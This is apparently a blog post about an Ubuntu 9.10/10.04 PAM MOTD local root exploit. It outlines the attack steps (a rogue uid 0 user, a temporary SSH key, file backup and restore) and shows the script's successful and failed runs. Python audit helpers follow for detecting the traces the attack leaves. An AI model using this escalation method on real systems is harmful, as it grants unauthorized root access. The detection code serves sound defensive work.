The exploit made by Kristian Erik Hermansen allows tampering with any file. From there we can get root, for example by adding a user with uid 0. We don't want an empty password, because the SSH server sshd defaults PermitEmptyPasswords to no. We also don't want to be prompted for the user's password when connecting over SSH, so we can create a temporary SSH key and add it to authorized_keys. We also want to be sure we back up any file we modify. Finally, we want to remove the rogue user and restore the files we modified.
With some shell scripting you can get the following exploit in simple bash:
user@ubuntu:~$ bash ubuntu-pam-motd-local-root.sh
[*] Ubuntu PAM MOTD local root
[*] Backuped /home/user/.ssh/authorized_keys
[*] SSH key set up
[*] Backuped /home/user/.cache
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] Restored /home/user/.cache
[*] Restored /home/user/.ssh/authorized_keys
[*] SSH key removed
[+] Success! Use password toor to get root
Password:
root@ubuntu:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
If you're not on Ubuntu 9.10/10.04, or your system is up to date, it should fail like this:
user@ubuntu:~$ bash ubuntu-pam-motd-local-root.sh
[*] Ubuntu PAM MOTD local root
[*] Backuped /home/user/.ssh/authorized_keys
[*] SSH key set up
[*] Backuped /home/user/.cache
[*] spawn ssh
[-] Own /etc/passwd failed
[*] Restored /home/user/.cache
[*] Restored /home/user/.ssh/authorized_keys
[*] SSH key removed
user@ubuntu:~$
It can be used as a proof of concept to show how important security updates are. Don't ignore them!
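The run above leaves three things a defender can check for: an extra uid 0 account in /etc/passwd, a key temporarily added to ~/.ssh/authorized_keys, and the sshd PermitEmptyPasswords setting the exploit has to work around. The following audit helpers are an added example written for this post; they are not the exploit script and not code from its author. They parse passwd(5)-format text, sshd_config text and authorized_keys text handed to them as strings, so they run offline; all sample inputs below are constructed, and the account name "rogue", the key blobs and the hostnames are made up.

```python
"""Audit helpers for the traces left by a uid 0 backdoor account (added example)."""
import re
from typing import Dict, List

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd(5)-format text into a list of field dictionaries.

    Lines with the wrong number of fields are kept with a 'malformed' marker
    so the audit reports them instead of silently skipping a half-written line.
    """
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != len(PASSWD_FIELDS):
            entries.append({"raw": line, "malformed": "yes"})
            continue
        entries.append(dict(zip(PASSWD_FIELDS, fields)))
    return entries


def find_rogue_superusers(text: str) -> List[str]:
    """Return names of accounts with uid 0 other than 'root', plus malformed lines."""
    findings = []
    for entry in parse_passwd(text):
        if entry.get("malformed"):
            findings.append("malformed:" + entry["raw"])
        elif entry["uid"] == "0" and entry["name"] != "root":
            findings.append(entry["name"])
    return findings


def effective_permit_empty_passwords(config_text: str) -> str:
    """Return the effective PermitEmptyPasswords value from sshd_config text.

    sshd takes the first occurrence of a keyword, ignores '#' comments, treats
    keywords case-insensitively, accepts 'key value' or 'key=value', and
    defaults to 'no' (sshd_config(5)). Assumption: a flat config with no
    Match blocks; options inside a Match block would need conditional handling.
    """
    for line in config_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", stripped, maxsplit=1)
        if len(parts) == 2 and parts[0].lower() == "permitemptypasswords":
            return parts[1].strip().lower()
    return "no"


def added_authorized_keys(backup_text: str, current_text: str) -> List[str]:
    """Return 'type blob' for keys present in current_text but not in backup_text.

    Keys are compared by type and base64 blob only, so a changed comment or
    option prefix does not hide or fake a difference.
    """
    key_re = re.compile(r"(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp\d+)\s+(\S+)")

    def key_ids(text: str):
        ids = set()
        for line in text.splitlines():
            line = line.strip()
            if line and not line.startswith("#"):
                match = key_re.search(line)
                if match:
                    ids.add((match.group(1), match.group(2)))
        return ids

    return sorted(f"{t} {b}" for t, b in key_ids(current_text) - key_ids(backup_text))


# Constructed sample inputs (not captured from a real host).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "user:x:1000:1000:user,,,:/home/user:/bin/bash\n"
    "rogue:x:0:0::/root:/bin/bash\n"
)
SAMPLE_SSHD_CONFIG = (
    "# Authentication:\n"
    "PermitRootLogin yes\n"
    "#PermitEmptyPasswords no\n"
    "UsePAM yes\n"
)
BACKUP_KEYS = "ssh-rsa AAAAB3CONSTRUCTEDUSERKEY user@laptop\n"
CURRENT_KEYS = BACKUP_KEYS + "ssh-ed25519 AAAAC3CONSTRUCTEDTEMPKEY temp-key\n"

if __name__ == "__main__":
    print("uid 0 accounts other than root:", find_rogue_superusers(SAMPLE_PASSWD))
    print("PermitEmptyPasswords:", effective_permit_empty_passwords(SAMPLE_SSHD_CONFIG))
    print("keys added since backup:", added_authorized_keys(BACKUP_KEYS, CURRENT_KEYS))
```

On a live system you would feed these functions the contents of /etc/passwd, /etc/ssh/sshd_config and the relevant authorized_keys file together with a known-good copy taken from a package manifest or configuration management. Note that the exploit in the post restores authorized_keys when it finishes, so the key comparison only catches an interrupted run; the extra uid 0 account in /etc/passwd is the durable trace.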
Hah...I considered adding the SSH automation as well to my very simplified published exploit version, but I chose not to because I felt messing around with someone's SSH keys is generally frowned upon ;) Glad to see someone posting that example though for others to try out. Cheers...